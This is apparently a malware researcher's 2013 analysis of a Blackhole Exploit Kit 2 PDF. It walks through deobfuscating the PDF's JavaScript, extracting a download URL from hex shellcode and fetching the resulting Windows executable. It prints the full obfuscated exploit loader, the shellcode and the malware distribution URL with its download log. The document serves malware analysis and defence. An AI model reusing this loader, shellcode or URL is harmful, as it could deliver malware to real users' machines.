MalwareMustDie

Guide to crack payload2 BHEK2/ 20120103 #MMD

Jan 3rd, 2013
======================================================================
#MalwareMustDie - @unixfreaxjp ~]$ date
Thu Jan  3 16:12:47 JST 2013
----------------------------------------------------------------------
// In the "other" PDF of the new obfs'ed BHEK reported/tweeted at:
// https://twitter.com/MalwareMustDie/status/286587621080182784
// https://twitter.com/MalwareMustDie/status/286593203459747840
//
// PDF file data:
// Date        Time   Size   Name      MD5
// 2013/01/03  05:22  10,053 b264b.pdf a9480ade56f5631bbc7eb4f71093a3ac
//
// At 0x13E5-0x23AC you'll see the JavaScript code below:
-----------------------------------------------------------------------
<BLAH!>
   :
<xfa:script contentType='application/x-javascript'>
  18.  rawd='4E@83J4A1648@23J3M3M41@5463P274E@73J4A163K@03K3K1I16@33L3L3L1I@9163M3M3M@21I163N3N@53N1I163O@63O3O1I16@13P3P3P1I@116404040@3274E3J4A@616484741@8464C3N4A@14B3H3J1I@31641274E@23J4A164G@916291646@93N4F162D@74A4A3J4H@41E1F274E@93J4A164H@816291646@03N4F162D@34A4A3J4H@81E1F274E@83J4A163H@9441N2918@5203L1O1M@7221M1M3O@81M211N23@9241M203J@41P3L1O1M@7221M1M3O@11M3O221P@8241M203J@63J1P3N3K@3241M203J@51P1M1O1M@2241O203J@5223N1O3O@7241M203J@7201N201N@1201N201N@71O221M1M@81M1M1M1M@41M1M1M1M@01M1M1M1M@01M1M1M1M@61M1M1M1M@91M1M1M1M@61M1M1M1M@51N1O1P25@9241M203J@722201O1M@0221M1M3O@71M1M1M20@71M1M1M1M@9201N201N@4201N201N@7201N201N@9201N201N@5181H4A3J@34F3M1O1K@74A3N4844@73J3L3N1E@11L271L3P@51I1D1D1F@0274E3J4A@9163H441O@82918203L@71O1M221M@61M3O3J21@7221P241M@9203J1P3L@31O1M221M@81M3O2522@51O1N241M@5203J251M@01N3O241M@3203J1P1M@6251M2420@6203J233M@0233N241M@5203J201N@5201N201N@0201N1O22@51M1M1M1M@31M1M1M1M@21M1M1M1M@91M1M1M1M@21M1M1M1M@11M1M1M1M@71M1M1M1M@51M1M231N@02424241M@6203J2220@91O1M221M@61M3O1M1M@81M201M1M@81M1M201N@6201N201N@6201N201N@6201N201N@5201N181H@74A3J4F3M@11O1K4A3N@348443J3L@43N1E1L27@91L3P1I1D@31D1F273H@8441P293J@54848273H@044202946@03N4F162D@34A4A3J4H@71E1F273O@14D463L4C@841474616@23H44211E@51F4J4E3J@94A163H44@422293H44@61P1K4E41@63N4F3N4A@2383N4A4B@94147461K@44C47354C@14A41463P@51E1F273H@34422293H@944221K4A@33N48443J@13L3N1E1D@71K1D1I1D@81D1F274F@84041443N@81E3H4422@21K443N46@43P4C4028@7201F3H44@7221H291D@41M1D274A@53N4C4D4A@94616483J@54A4B3N2L@8464C1E3H@744221I1N@81M1F4L3O@64D463L4C@941474616@33H44231E@53H44241I@63H44251F@94J4F4041@4443N1E3H@844241K44@83N463P4C@0401G1O28@93H44251F@53H44241H@3293H4424@0274A3N4C@84D4A4616@43H44241K@74B4D3K4B@94C4A4146@43P1E1M1I@73H44251L@11O1F4L3O@94D463L4C@541474616@83H2L1M1E@33H2L1N1F@24J3H2L1N@0294D463N@84B3L3J48@03N1E3H2L@71N1F274A@6474C3N2G@83J43293H@82L1N1K44@93N463P4C@5401G1O27@43M3J4334@1474C3N29@14D463N4B@23L3J483N@11E1D1B4D@2251M251M@31D1F274B@7484A3J4H@7293H4423@31E3M3J43@734474C3N@21I1M4G1O@01M1M1M1J@64A4
74C3N@82G3J431F@82744474G@939403N3N@7293H2L1N@51H4B484A@03J4H2744@3474G3940@93N3N293H@044231E44@1474G3940@13N3N1I21@91O201M25@0241F273O@9474A1E41@7291M2716@141162816@6201M1M27@216411H1H@41F3H4420@83D413F29@644474G39@6403N3N1K@24B4D3K4B@04C4A1E1M@51I44474G@939403N3N@51K443N46@43P4C401J@31N1F1H3M@83J433447@14C3N274L@23O4D463L@84C414746@2163H2L1O@91E3H2L1N@51I443N46@21F4J4F40@241443N1E@43H2L1N1K@4443N463P@64C402844@53N461F3H@32L1N1H29@83H2L1N27@64A3N4C4D@14A46163H@12L1N1K4B@24D3K4B4C@54A41463P@61E1M1I44@23N461F4L@33O4D463L@44C414746@4163H2L1P@31E3H2L1N@11F4J4A3N@64C291D1D@1273O474A@51E41291M@92741283H@92L1N1K44@83N463P4C@34027411H@7291O1F4J@13K293H2L@31N1K4B4D@43K4B4C4A@51E411I1O@71F273L29@8483J4A4B@03N2L464C@51E3K1I1N@3221F274A@33N4C1H29@5354C4A41@1463P1K3O@64A47452F@7403J4A2F@3473M3N1E@13L1F274L@54A3N4C4D@84A46164A@53N4C4L3O@94D463L4C@441474616@03H42411N@21E3H2L1N@01I3H2L20@11F4J3H2L@721291D1D@2273O474A@21E3H2L22@8291M273H@52L22283H@12L1N1K44@93N463P4C@040273H2L@5221H1H1F@44J3H4425@0293H2L20@51K443N46@43P4C4027@53H2L2329@03H2L1N1K@03L403J4A@32F473M3N@12D4C1E3H@62L221F27@03H2L2429@53H2L201K@83L403J4A@72F473M3N@32D4C1E3H@52L221B3H@644251F27@73H2L211H@729354C4A@041463P1K@03O4A4745@12F403J4A@72F473M3N@21E3H2L23@33G3H2L24@51F274L4A@93N4C4D4A@746163H2L@6214L3O4D@0463L4C41@44746163H@32L251E3H@02L221F4J@03H421M29@93H2L221K@74C47354C@04A41463P@91E1N221F@2273H421N@2293H421M@61K443N46@43P4C4027@93H2L2129@61E3H421N@11B1O1F2B@41D1M1D1H@33H421M26@93H421M27@34A3N4C4D@04A46163H@92L214L3O@34D463L4C@141474616@73H421O1E@73H2L1N1F@74J3H2L21@4291D1D27@73O474A1E@43H2L2229@11M273H2L@922283H2L@81N1K443N@4463P4C40@1273H2L22@01H291O1F@34J3H2L21@01H291D1B@14D1D273H@52L211H29@33H2L251E@53H2L1N1K@33L403J4A@72F473M3N@42D4C1E3H@92L221H1N@91F1F273H@02L211H29@23H2L251E@83H2L1N1K@33L403J4A@42F473M3N@82D4C1E3H@72L221F1F@64L4A3N4C@74D4A4616@63H2L214L@33O4D463L@14C414746@3163H421P@91E1F4J3H@44220293H@444211E1F@727413O1E@03H422028@5251M1M1M@81F4J3H42@621291D47@61H4D2D35@1423P3P3P@143484D2O@9202E2N1L@61L1
L1L1L@44F2D2D2D@82D2E2D2D@22D2D2D2D@52D2D2D2D@72D2D332D@22D2D2D2D@92D2D2D3O@8403J2D35@5412D3P3B@32D25242H@62L2E2N1D@4273H4222@9293H441N@5273H4223@1293H2L1P@41E3H4222@61F4L3N44@64B3N4J3H@34221291D@3432E1H2D@135424133@3402H4825@33O472E2N@61L1L1L1L@31L4F2D2D@12D2D2E2D@42D2D2D2D@42D2D2D2D@42D2D2D33@32D2D2D2D@02D2D2D2D@83B4G2F2D@235412D3P@43B2D1L3O@32H202E2N@11D273H42@622293H44@41O273H42@923293H2L@11P1E3H42@8221F4L3H@74224291D@835374349@72D2G3P3P@22D2D2E2E@91D273H42@425293H2L@11O1E1D33@7372I2E1D@71I1N1M25@424201F27@83H44441M@0291D3333@93L2D2D2D@72H2G2D2D@32H2D2D2D@12D4F2L2D@12D2D2D33@92H2G2D2D@52H2D2D2D@72D2E2D2D@12D2D2D4F@62H2G2D2D@12H2D2D2D@52D2E2D2D@12D2D2E3P@42H2G2D2D@12H2D2D2D@62D2E2D2D@42D2D2H33@52H2H2D2D@42H2D2D2D@12D2L2D2D@32D2D2I4F@32H2H2D2D@62H2D2D2D@42D4F2L2D@92D2D372D@72H2G2D2P@14F2D2D2D@72F352L2D@12D2D2D2D@22D2D2D2D@92D2P2G2D@2421L1L1L@91L1L1D27@53H44441N@5293H4224@01H3H4225@41H3H4444@31M1H3H42@921273H44@6441O293H@142411N1E@03H42231I@31D1D1F27@2413O1E3H@544441O1K@7443N463P@04C401B1O@11F3H4444@21O1H294D@6463N4B3L@43J483N1E@71D1B1M1M@21D1F273H@044441P29@13H421O1E@13H44441O@71F274F41@44C401E4J@043263H44@0441P4L1F@63H2L1M1E@0431F272L@5453J3P3N@52I413N44@53M1N1K4A@03J4F383J@8444D3N29@13H44441N@54L3H421P@91E1F27';
  19.  rawd2='6683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f39332e3139302e34342e3137372f636c6f736573742f3938796638393133666a6970676a69616c6867383233396a676967686e6a683469366b356f2e7068703f696e686f713d33303a316e3a31693a31693a333326796f6f726d7576653d316b3a31663a32773a316d3a33313a316f3a316c3a316c3a33303a3331267563623d3169266671747a65683d6c6f666670267077656a663d6369727063640000';
tt="t"+"a"+"rg";
with(event){
ev=/*123123*/"ev"/*/renyaerz*/;
ev+="a";
l="l";
t=target;
ev+=l;
cr='ti';
cr2='au';
cr2+='th';
cr3='sp';
cr3+='l';
cr4='rep';
cr4+='l';
if(event.name==='Ini'+'t'){
    cr+=/*%#!%#!*/'t';
    k=t[ev];
    cr+='le';
    cr2+='or';
    cr3+='it';
    a=rawd;}
}
s="";
z=a;
str="Str";
str+="i";
str+="ng";
ss=(k)?k(str):12;
cr4+='ace';
ff="f1r2o3m4C5h6a7r8C9o0d1e"[cr4](/[0-9]+/g,'');
pp="par";
ss=ss[(k)?ff:0];
pp+=ss(115,101,73,110,116);
q=t[pp];
xz=a.length;
for(i=0;xz&gt;i;i=2+i){
    i2=i+1;
    if (z[i]!='@')
    if(event.name==='Ini'+'t')s+=(ss(q(z[i]+z[i2],26)));
}
z=xvasvs=s;
k(z);

</xfa:script>
   :


// It uses malicious JS commands in scattered strings,
// /* comment */ blocks to confuse the deobfuscator,
// and the event & target objects to manipulate the eval's output.
// My tip is: be smart!
// At the top you saw the rawd string, which is the obfs'ed exploit code,
// followed by rawd2, which at a glance I know as a shellcode
// format; well, in my case I just hit the shellcode :-)
// For deobfuscating the exploit code you need to make it simple with the following tips:
// 1. Make the code simple: merge the scattered commands, join the /*comment*/
// 2. Re-code all variables related to the event & target
// 3. In the end just document.write(z); or eval(z); <-- key of the deobfs.
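
// Added example, not part of the original paste: a static Python decoder for the
// rawd encoding plus the tip-1 cleanup, so the stage can be read without running it.
// RAWD_PREFIX is the first 30 characters of rawd above; the function names are made up here.

```python
import re

# Digits valid for parseInt(x, 26): 0-9 and A-P (case-insensitive).
_PAIR = re.compile(r"[0-9A-Pa-p]{2}")
_COMMENT = re.compile(r"/\*.*?\*/", re.S)
_CONCAT = re.compile(r"""(['"])([^'"\\]*)\1\s*\+\s*(['"])([^'"\\]*)\3""")


def decode_rawd(blob):
    """Static equivalent of the loader's loop: step two characters at a
    time, skip pairs starting with '@' (filler), otherwise apply
    String.fromCharCode(parseInt(pair, 26))."""
    out = []
    for i in range(0, len(blob), 2):
        pair = blob[i:i + 2]
        if pair.startswith("@"):
            continue
        if not _PAIR.fullmatch(pair):
            # Truncated or damaged input: stop instead of guessing.
            raise ValueError("unexpected pair %r at offset %d" % (pair, i))
        out.append(chr(int(pair, 26)))
    return "".join(out)


def simplify(js):
    """Tip 1: drop /* ... */ filler and merge 'a'+'b' literal splits.
    Only literal+literal is folded; += accumulation is left as is."""
    js = _COMMENT.sub("", js)
    while True:
        merged = _CONCAT.sub(
            lambda m: '"%s%s"' % (m.group(2), m.group(4)), js)
        if merged == js:
            return js
        js = merged


# First 30 characters of rawd and one loader line, both as shown in the paste.
RAWD_PREFIX = "4E@83J4A1648@23J3M3M41@5463P27"
LOADER_LINE = 'ev=/*123123*/"ev"/*/renyaerz*/;'

if __name__ == "__main__":
    # The decoded text is only printed for reading, never evaluated.
    print(decode_rawd(RAWD_PREFIX))
    print(simplify(LOADER_LINE))
```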


// Look at rawd2 closely: the combination of the strings
// "68 74 74 70 3A 2F 2F 39" and "00 00" at the end suggests to me
// that a hidden URL is in there...


// Save the string into a binary file and save it as text

// in hex...


// in ASCII...



// You'll see the URL below at the end of the garbled strings ;-)

http://93.190.44.177/closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?inhoq=30:1n:1i:1i:33&yoormuve=1k:1f:2w:1m:31:1o:1l:1l:30:31&ucb=1i&fqtzeh=loffp&pwejf=cirpcd
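
// Added example, not part of the original paste: pulling the printable strings and the
// NUL-terminated URL out of a hex shellcode dump in Python. SAMPLE_HEX is constructed
// (documentation address 192.0.2.10); the function names are assumptions of this example.

```python
import re

# URL scheme followed by printable, non-space bytes; stops at NUL or any
# other non-printable byte, which is how the string ends in shellcode.
_URL = re.compile(rb"(?:https?|ftp)://[\x21-\x7e]+")


def _to_bytes(hex_text):
    """Accept contiguous or space/newline separated hex, upper or lower."""
    return bytes.fromhex("".join(hex_text.split()))


def shellcode_strings(hex_text, min_len=4):
    """Return (offset, text) for each printable-ASCII run of at least
    min_len bytes, the same idea as the Unix strings tool."""
    run = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [(m.start(), m.group().decode("ascii"))
            for m in run.finditer(_to_bytes(hex_text))]


def embedded_urls(hex_text):
    """Return URLs even when printable opcode bytes sit directly in
    front of them (the search is not anchored to the start of a run)."""
    return [m.group().decode("ascii")
            for m in _URL.finditer(_to_bytes(hex_text))]


def defang(url):
    """Rewrite an extracted URL so it is not clickable in reports."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


# Constructed sample: filler bytes, two printable bytes that happen to
# precede the URL, the URL itself, then the 00 00 terminator.
SAMPLE_URL = "http://192.0.2.10/gate.php?a=30:1n&b=1i"
SAMPLE_HEX = (b"\x90\x90\xe8\x00\x00\x00\x00\x1a/p"
              + SAMPLE_URL.encode("ascii") + b"\x00\x00").hex().upper()

if __name__ == "__main__":
    for offset, text in shellcode_strings(SAMPLE_HEX):
        print("0x%04x  %s" % (offset, text))
    for url in embedded_urls(SAMPLE_HEX):
        print(defang(url))
```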

// Fetch it:

--15:48:34--  http://93.190.44.177/closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?inhoq=30:1n:1i:1i:33&yoormuve=1k:1f:2w:1m:31:1o:1l:1l:30:31&ucb=1i&fqtzeh=loffp&pwejf=cirpcd
           => `98yf8913fjipgjialhg8239jgighnjh4i6k5o.php@inhoq=30%3A1n%3A1i%3A1i%3A33&yoormuve=1k%3A1f%3A2w%3A1m%3A31%3A1o%3A1l%3A1l%3A30%3A31&ucb=1i&fqtzeh=loffp&pwejf=cirpcd'
Connecting to 93.190.44.177:80... seconds 0.00, connected.

---request begin---
GET /closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?inhoq=30:1n:1i:1i:33&yoormuve=1k:1f:2w:1m:31:1o:1l:1l:30:31&ucb=1i&fqtzeh=loffp&pwejf=cirpcd HTTP/1.0
Referer: http://google.com/url?
User-Agent: #MalwareMustDie is changing the lock of The Moronz's front gate...
Accept: */*
Host: 93.190.44.177
Connection: Keep-Alive
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Thu, 03 Jan 2013 06:48:28 GMT
Content-Type: application/x-msdownload
Content-Length: 73728
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: public
Expires: Thu, 03 Jan 2013 06:48:34 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="calc.exe"
Content-Transfer-Encoding: binary
  :
200 OK
Registered socket 1920 for persistent reuse.
Length: 73,728 (72K) [application/x-msdownload]
100%[====================================>] 73,728        45.57K/s
15:48:37 (45.49 KB/s) - `98yf8913fjipgjialhg8239jgighnjh4i6k5o.php@inhoq=30%3A1n
%3A1i%3A1i%3A33&yoormuve=1k%3A1f%3A2w%3A1m%3A31%3A1o%3A1l%3A1l%3A30%3A31&ucb=1i&
fqtzeh=loffp&pwejf=cirpcd' saved [73728/73728]

// Let's save it as calc.exe and here we are:

Date        Time   Size   Name     MD5
------------------------------------------------------------------------
2013/01/03  15:48  73,728 calc.exe aed9ac49b10a75d54f37079b18c11153
------------------------------------------------------------------------
Just as expected, same payload:

SHA1:   e6561522623e3aff12f806bed88eb326b78af7e1
MD5:    aed9ac49b10a75d54f37079b18c11153
File size:  72.0 KB ( 73728 bytes )
File name:  info.exe
File type:  Win32 EXE
Tags:   peexe
Detection ratio:    8 / 45
Analysis date:  2013-01-02 22:25:55 UTC ( 8 時間, 28 分 ago )
url: https://www.virustotal.com/file/b9c4b1ecaa15631735cd56ac3c70a2492b2ebc052aa1b3187178765e508e2678/analysis/


------
"For the sweat and tears of the tireless InfoSec Researcher who fights against malware.."
   "we dedicated our expose to restore the purity of internet!"
      "Non nobis domine, non nobis, sed nomini tuo da gloriam!"

                   #MalwareMustDie